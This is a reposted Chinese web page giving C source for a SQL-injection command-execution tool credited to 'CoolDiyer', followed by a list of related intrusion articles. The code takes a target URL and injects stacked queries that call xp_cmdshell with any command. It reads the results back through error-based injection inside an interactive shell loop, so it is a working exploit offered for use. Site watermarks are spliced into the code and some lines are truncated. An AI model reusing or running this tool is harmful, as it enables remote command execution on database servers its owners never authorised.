Sql注入SA权限CMD终结者C源码
来源:互联网 发布:淘宝客服售后技巧话术 编辑:程序博客网 时间:2024/04/29 12:41
Poered By CoolDiyer
//由于时间问题,没加注释学过C的应该都能看懂
//////////////////////////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
#include
#pragma comment(lib, "wininet.lib")
char *injurl,*type,*end;
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;
}
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL '%s';insert into [SIC_Tmp] values ('[g_over]')--",injurl,type,cmd); www_bitscn_com中国.网管联盟
response=GetResult(url);
while(1){
memset(buff,0,sizeof(buff));
memset(result,0,sizeof(result));
wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then '[CoolDiyer][CoolDiyer]' else '[CoolDiyer]'%%2BResultTxt%%2B'[CoolDiyer]' end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
response=GetResult(url);
if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
else {
puts("Cann't Injection It");
return;
}
strncpy(buff,p+11,p1-p-11);
if (!strcmp(buff,"[g_over]")){
wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
GetResult(url);
return;
}
//filter
for(i=0,j=0;iif(buff[i]=='&' && buff[i+2]=='t' && buff[i+3]==';'){
www@bitscn@com
if (buff[i+1]=='l')result[j]='<';
if (buff[i+1]=='g')result[j]='>';
i+=3;
}
else if(buff[i]=='&' && buff[i+1]=='q' && buff[i+2]=='u' && buff[i+3]=='o' && buff[i+4]=='t' && buff[i+5]==';'){
result[j]='"';
i+=5;
}
else result[j]=buff[i];
}
puts(result);
memset(url,0,sizeof(url));
n++;
}
}
void main(int argc,char **argv)
{
char cmd[1024];
printf("=[Sql Inj CMD]======================================================/n");
printf("/tSQL Injection Command Exploit Powered By CoolDiyer/n/n");
if(argc!=3){
printf("/tUsage:sqlcmd.exe /n");
printf("/t/tType:/t0->Number1->char2->Search/n"); [bitsCN_com]
printf("/tExample:/n/t/tsqlcmd.exe http://localhost/index.asp?id=1 0/n");
printf("=05-12-22===========================================================/n");
return;
}
injurl=argv[1];
if(atoi(argv[2])==0){
type="";
end="";
}
if(atoi(argv[2])==1){
type="'";
end=" and ''='";
}
if(atoi(argv[2])==2){
type="%'";
end=" and '%'='";
}
while (1)
{
printf("Sql Inj CMD>");
gets(cmd);
if (!strcmpi(cmd,"exit"))return;
ExecCommand(cmd);
}
}
【转自www.bitsCN.com】
- Sql注入SA权限CMD终结者C源码
- [转]Sql注入SA权限CMD终结者+C源码
- SQL Server 2008 SA 权限 注入点 而我却无可奈何
- 当注入拥有sa权限,提升webshell权限!
- ADODB.Command 终结所有SQL注入
- ADODB.Command 终结所有SQL注入
- SQL万能钥匙注入的终结版
- SQL Server SA权限总结经典技术
- sql 2005 sa权限提权
- MSSQL注入SA权限不显错模式下的入侵
- cmd中命令修改sql server 2005的sa密码
- SQL注入之权限提升
- MS SQL数据库SA权限入侵的感悟
- MS SQL数据库SA权限入侵的感悟
- HOHO,搞定SQL创建SA权限用户(MSSERVER2000)
- MS SQL数据库SA权限入侵的感悟
- Microsoft SQL Server SA权限最新入侵方法
- “赤手空拳”打开SQL Server Express开放SA的登陆权限
- 低效的SelectSingleNode和高效的ListView数据添加
- 详细讲解学习ASP Server对象使用方法
- request对象的使用方法
- ASP.NET Pre-Compilation and Keep-Alive
- .NET自动服务程序—C#(一)
- Sql注入SA权限CMD终结者C源码
- 利用C#进行AutoCAD的二次开发(三)
- Sharepoint 中的 Column Type的含义
- 牛根生的交际之道
- C# 实现Base64的编码解码
- [C#]C#浏览器基本原理
- 感人的真实故事(同事介绍的)
- Enable root access to FTP server;
- .NET平台下Web树形结构程序设计